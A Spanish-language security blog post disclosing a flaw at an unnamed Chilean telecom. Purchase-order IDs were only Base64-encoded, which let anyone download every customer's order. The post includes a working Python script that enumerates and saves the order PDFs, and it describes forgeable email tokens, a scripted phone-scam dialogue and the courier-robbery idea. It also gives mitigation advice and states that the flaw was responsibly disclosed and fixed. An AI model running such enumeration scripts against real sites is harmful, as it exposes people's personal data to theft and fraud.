28 jun. 2019

Hackeando Todas Las Órdenes De Compra De Una Empresa De Telefonía / Base64 NO es un método de encriptación


Base64 es un sistema de numeración posicional que usa 64 como base. Es la mayor potencia de dos que puede ser representada usando únicamente los caracteres imprimibles de ASCII [1].

Todos los sistemas de numeración tienen una lista de símbolos que utilizan para representar valores, por ejemplo [2]:

Binario: 01
Decimal: 0123456789
Hexadecimal: 0123456789ABCDEF
y para Base64 el conjunto es:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

La función para codificar en Base64 es biyectiva, lo que significa que existe una función que dado un texto encriptado en Base64, esta obtiene el texto original.
base64encode('blackploit') = 'YmxhY2twbG9pdA=='
base64decode('YmxhY2twbG9pdA==') = 'blackploit'

Base64 no es un método de encriptación. Si bien ofusca la información ante la vista normal, se puede obtener la información original muy fácilmente.

Base64 pesa un 33% más que la información original. Esta relación está dada por la relación 8 a 6 bits por carácter, (o sea, un carácter de base64 representa menos información que un carácter normal).

Base64 es muy útil, y sus tres principales usos son:
  • Transmitir datos en codificaciones conocidas como ASCII o utf-8, sin tener problemas de compatibilidad entre sistemas, lo que permite transmitir binarios también.
  • Permite pasar a través de URLs caracteres raros o comodines como #/^? sin ser procesados por el navegador.
  • Puedes visualizar imágenes en Base64, por lo cual puedes guardar tus imágenes como texto en una base de datos y no como archivos en un sistema de ficheros.

Este emoji está en Base64:
<img src="">

Esta larga introducción es para mostrarles que Base64 NO es un método de encriptación. Comprando un producto a través de una página de telefonía, me encontré con que usaban como método de "seguridad" pasar el id de una orden de compra encriptada codificada a Base64, lo cual permitió una fuga generalizada de las órdenes de compra de esa empresa.

Aquí los dejo con el análisis de las vulnerabilidades:

Vulnerabilidades

Vulnerabilidad 1 - Obtención de todas las órdenes de compra

Una vez que se compra un producto en "empresa telefonía", se envía la orden de compra con un enlace con el siguiente formato:
https://empresatelefonia.cl/fullprice/certificadopdforden?id=NDAwMDAxOTgyNQ==

Como podemos notar el parámetro id recibe algo en Base64, si lo decodificamos nos damos cuenta que es exactamente el id de la compra:
NDAwMDAxOTgyNQ== → 4000019825

También podemos notar que la orden de compra es un número ascendente, que probablemente parte del 4000000000.

Para obtener todas la órdenes se crea un simple script en python que recorre las órdenes del 4000000000 al 4000200000 (empíricamente podemos notar que llegan hasta solo 4000019831 al momento de escribir este reporte), la orden se codifica a Base64 y se concatena con la URL que genera la orden de compra:

import threading
import time
import requests
import base64
import sys
import os

START_IN = 4000000000
STOP_IN = 4000020000
THREADS = 5
SAVE_PATH = './orders'

class ThreadFunction(threading.Thread):
    def run(self):
        global START_IN
        while True:
            START_IN +=1
            if START_IN > STOP_IN:
                break
            order_number = str(START_IN)
            b64_order_number = base64.b64encode(order_number.encode('ascii')).decode("utf-8")
            url_order = 'https://empresatelefonia.cl/fullprice/certificadopdforden?id={}'.format(b64_order_number)
            r = requests.get(url_order)
            print('[{}] \t {} -> order: {}'.format(r.status_code, url_order, START_IN))
            if r.status_code == 200:
                with open('{}/{}.pdf'.format(SAVE_PATH, order_number), 'wb') as f:
                    f.write(r.content)
            else:
                continue

def main():
    if not os.path.exists(SAVE_PATH):
        os.makedirs(SAVE_PATH)
    if len(sys.argv) >= 2:
        global THREADS
        THREADS = int(sys.argv[1])
    if len(sys.argv) >= 3:
        global START_IN
        START_IN = int(sys.argv[2])
    if len(sys.argv) >= 4:
        global STOP_IN
        STOP_IN = int(sys.argv[3])
    for x in range(threads):
        mythread = ThreadFunction(name = "Thread-{}".format(x + 1))
        mythread.start()

if __name__ == '__main__':
    main()

Modo de uso:
python3 ordenes.py <n° de threads> <n° primera orden> <n° última orden>

Con este script se puede obtener 19783 órdenes de compra (510 MBs):


Los datos obtenidos son privados y en su conjunto, sensibles:


Datos:
  • Nombre
  • Apellido
  • RUT
  • Mail
  • Teléfono
  • Dirección
  • Producto y precio de compra

Vulnerabilidad 2 - Sensitive Data Exposure

Si se induce un error en la URL anterior, obtenemos un error demasiado verboso:
https://empresatelefonia.cl/fullprice/certificadopdforden?id=jw==
 

Datos obtenidos:
  • Ruta completa de la aplicación
  • Framework de programación

Vulnerabilidad 3 - Confirmación de correo

En la misma línea se encontró que el enlace para confirmar el correo, también pasa los datos codificados en base64, por ende fácilmente decodificable:

https://empresatelefonia.cl/ValidacionMailAPP/Valida?token=cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw

cnV0PTE4OTk5OTk5LTAmbWFpbD1waWNob25AZ21haWwuY29tJmVudGlkYWQ9NTY5NSZlbnRpZGFkaWQ9MTA2MTIyOTQw rut=18999999-0&[email protected]&entidad=5695&entidadid=106122940

Más allá de que es una mala práctica pasar datos personales por método GET, se puede crear un script que genere automáticamente el "token" de verificación de correo, bajo el supuesto de que el RUT y correo ya lo tenemos gracias a la vulnerabilidad anterior.

Vulnerabilidad 4 - Demasiada información sin seguridad

Con el siguiente enlace se puede obtener el seguimiento de una orden, lo que incluye el producto comprado.
https://empresatelefonia.cl/seguimiento-despacho/resultados/index/orden/4000019747


Esto quizás no parece una vulnerabilidad, pero se puede crear un script que vaya obteniendo los productos que vende la empresa en tiempo real, información muy útil para la competencia.

Vectores de ataque

Vector de ataque 1 - Interceptación física

Con la vulnerabilidad 1 y 4 se puede saber quién compra, dónde y cuándo va llegar el producto, por tanto un delincuente puede esperar a que llegue un repartidor para asaltarlo, ya que se sabe exactamente con que producto anda.

Vector de ataque 2 - Estafa telefónica

Delincuente: Aló
Víctima: Hola
Delincuente: Estimado Rodrigo Perez, lo llamamos de Empresa Telefonía ya que se compró un teléfono iPhone X el día de ayer. ¿Cierto?
Víctima: Si
Delincuente: Queremos decirle que el celular que le costó $1.039.000 estaba en oferta y se le cobró de más, el precio real era de $690.000. ¿Sería tan amable de darnos su tarjeta de crédito para abonarle la diferencia?
Víctima: Claro

Vector de ataque 3 - Cualquier tipo de ataque de ingeniería social

Dado que se tienen muchos datos personales, en manos de delincuentes estos datos serían propicios para cometer una infinidad de delitos de ingeniería social.

Mitigación

Siempre que se deba pasar datos sensibles a través de un enlace, este debe ser un token del id original.
Se define como token un string alfanumérico único lo suficientemente largo para que no sea adivinable y que no exista una función matemática lineal que dado un token se obtenga el id original.
Existen muchas funciones generadoras de hash como sha256, sha2, sha3, etc... Para que sea un token seguro se recomienda usar valores aleatorios y una combinación de funciones de hash.
Por tanto lo que se debe hacer es crear por cada orden un token y que los enlaces en la vulnerabilidad 1 y 4 reciban como parámetro ese token.

Ejemplo:
https://empresatelefonia.cl/fullprice/certificadopdforden?id=abfae0f14c8a4c6d08bb618bf1955086
https://empresatelefonia.cl/seguimiento-despacho/resultados/index/orden/abfae0f14c8a4c6d08bb618bf1955086

id_orden token_orden id_cliente ...
4000019747 abfae0f14c8a4c6d08bb618bf1955086 231 ...
4000019748 0fe44a966488ed7987d0c760d0699365 532 ...
... ... ... ...

Exactamente lo mismo se debe hacer en la vulnerabilidad 3, donde se debe generar un token único por usuario y pesarlo como parámetro el token del usuario y no los datos.
Base64 no sirve para cifrar datos ya que solo lo codifica, es decir, existe una función que puede revertir la codificación y obtener los datos originales.

Conclusión

  1. Base64 NO es un método de encriptación.
  2. La empresa involucrada se comportó muy profesionalmente, me llamaron en menos de 48 horas del reporte, y repararon absolutamente todas las vulnerabilidades en menos de una semana, y eso que eran complicadas de resolver ya que tenían que cambiar el modelo de la base de datos. Además contaban con un área de Cyber Seguridad y no como un banco que hablé en el pasado que trató el problema como un ticket de servicio al cliente. Felicitaciones!
  3. Los datos obtenidos fueron con fines demostrativos y todas las órdenes obtenidas en el POC fueron eliminadas.


Bibliografía

  1. https://es.wikipedia.org/wiki/Base64
  2. https://varionet.wordpress.com/2009/11/06/sobre-base64-para-que-usarlo-para-que-no-y-como-manejarlo-en-net-y-asp-net/

Saludos ;)



Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (5) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (9) Cryptsetup (1) DDoS (11) DEF CON (3) DEFCON (6) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (9) PDF (6) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (9) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (4) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (144) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (73) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (47) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (15) Youtube (1)

 
biz.